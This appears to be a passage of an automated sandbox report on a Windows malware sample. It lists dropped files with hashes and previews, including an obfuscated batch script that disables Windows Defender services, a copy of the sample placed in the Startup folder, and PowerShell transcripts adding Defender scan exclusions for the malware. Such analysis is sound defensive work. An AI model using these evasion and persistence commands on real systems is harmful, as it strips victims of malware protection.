                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.1BWqT5MQ.20210915152050.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.398828126636718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZn/GN0LqDo1Z8eZnZ/GN0LqDo1ZVV4z+zQzjZX/GN0LqDo1ZJ5zAzAzyZx:x13
                                                                                                                  MD5:B15F614B0471F176EFB6F7630773048B
                                                                                                                  SHA1:5F97F115867D89C9FAF09955AEFFD7437F6171C8
                                                                                                                  SHA-256:036E8AF2D6FB9344AD8A6C5560D6C442C1C49C4AA6A5F03B99626E0090C1E809
                                                                                                                  SHA-512:45219D52248094B3CD9876B84881CB082FCADD01350DBF2CFDFB58FEF9F997D113289F8D9B2B274736CA56DE34FCAFE1DEEDE3F420715D2A2E9026DFA17D3964
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152052..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 2196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152052..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152605..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.RiCjU3CB.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.377611337291585
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQAqDo1ZFeZB/GNQAqDo1Zr8vE+vEEvEjZCS/GNQAqDo1ZYGvvE0vE0vEy0:Ob/7GyppT0
                                                                                                                  MD5:F724E4C3720803E5FFA61B24FA414F72
                                                                                                                  SHA1:714A38EDE8D10FE988321DEAB63A668D3F5974E1
                                                                                                                  SHA-256:FBA9CFDE2C292FB013E5A6BB0A962829064FF184E2217646F04B424F5A7EAB7F
                                                                                                                  SHA-512:FE248FDBF57B046939928A0A18E8D2DD32388DA4CED1C95FFF08E03BE4946B38F0CDD27DACC2B517CA007B3CE5B46C3074CE83E554CFF8D4C8A68143955FD1CA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152353..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.Vuu9YzJB.20210915152106.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.375814590595939
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQVqDo1ZFeZ//GNQVqDo1Z+8vE+vEEvEjZz/GNQVqDo1ZyvvE0vE0vE4Z/:jb/9ppH
                                                                                                                  MD5:12E8ED4AD3974E4B99B309DFA27FAC17
                                                                                                                  SHA1:EC930ADCFBBF2717C452557EE84EAD0A8ACB5EAC
                                                                                                                  SHA-256:4087655714E431A4412B1C1C8EF8DCB2A775264A414C07C51DC0B1FD35391756
                                                                                                                  SHA-512:E65945D8F98D94874332F6CC87DE1C06F9B662CF65F557EC4FA2DD6D8393663F11C3CA4F53D8EED990DEC5FC93D678AB5D1D2B408441C2B2106C07D057E4376F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152412..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.cMiMRTOx.20210915152053.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.335036846510616
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZsZ/GN7dqDo1ZOXrSpZF/GN7dqDo1Zfq/m0cm0cm02Zh:g7dyyp
                                                                                                                  MD5:B4CD5A7CB3EC649B1EEB90E0AEDE25E5
                                                                                                                  SHA1:7C495D64F90F7EB2AA89D825B31A57CBD374B09B
                                                                                                                  SHA-256:25BEE175151AD7F1CF6D109F869A899A54B76195D6A1C5AB1874289BACFC4A0B
                                                                                                                  SHA-512:1717BFC21617347521A8A3DC9557006BE29EF9CB7C05ABEF7394318AC91E56BCF662254FBFB86118613A7026B8609386C961228D1702745D129FCF2F747BAAA9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152055..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..Process ID: 1036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152055..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..**********************..Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.fN_Cx1KH.20210915152048.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.399822672423884
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZ7/GN0sqDo1ZUeZs/GN0sqDo1Zu4z+zQzjZn/GN0sqDo1ZZ5zAzAzTZz:n
                                                                                                                  MD5:DB644147D05DC4A8BA2A5AB2513E0EB9
                                                                                                                  SHA1:5E2F506D4A6B09859A9343EB5E3E61D070AAE3CC
                                                                                                                  SHA-256:091C3BB1A1498529A68C6E0AD657CAD90583059454D9FDB09E1CFF292F034388
                                                                                                                  SHA-512:372C164B26DDB4AC73A2E52AABC4AF575BE1E317A17ECEED25F79851C23CBA71228F66AE3880F005C7EB139F9BD9A40B7E449F0E9A506CA43ACFB38EB9E1B2BF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152049..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 2968..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152049..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152400..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.jKue+ViU.20210915152052.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.337268833501308
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZd/GN7zqDo1ZRRpZP/GN7zqDo1ZIq/m0cm0cm0oZP:eyyZ
                                                                                                                  MD5:0089AE0D1D8FA20227C93299693DB26A
                                                                                                                  SHA1:1549B1FAF6E0E6C37425949D8AAF9C92B045E5E9
                                                                                                                  SHA-256:EACCA5E385F835F41A0B3FE5EC2CE7EC5825E15A4584DFC4E5AF697CAA26AA62
                                                                                                                  SHA-512:F1C0FD3769D518A2345A61F0D1F9DD70B46F381E80C1B125AF6A739B6358E0C7D0480040570522D4006CD195D33C9601FC6DBAC5A3749E9743F52C645B2B7A8C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152054..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..Process ID: 5456..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152054..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..**********************..Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.uTd+oL9Y.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.4003906307965535
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GN0rqDo1ZreZe/GN0rqDo1ZxN4z+zQzjZ1/GN0rqDo1Zw5zAzAzyZN:2g
                                                                                                                  MD5:D0418EEA6E506488A09F65A3AF9623CE
                                                                                                                  SHA1:6C3CB13E6AB71365C568E072F4CBBB1BEE4D6FC3
                                                                                                                  SHA-256:4819856AF3763A3D4CAAEA94B16F94DB7756E08243BF882BE108708D31384186
                                                                                                                  SHA-512:8CEEC55383CFFEE1B21388EBE2762F11424487306174D8EC867038DE5943527A5258AE9A2DEDF351B8806C185A7A0F7B103AD9588EE31F30F05B17A4379A96E5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 6804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152428..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.zLIiz7Tp.20210915152056.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.400612170734219
                                                                                                                  Encrypted:false
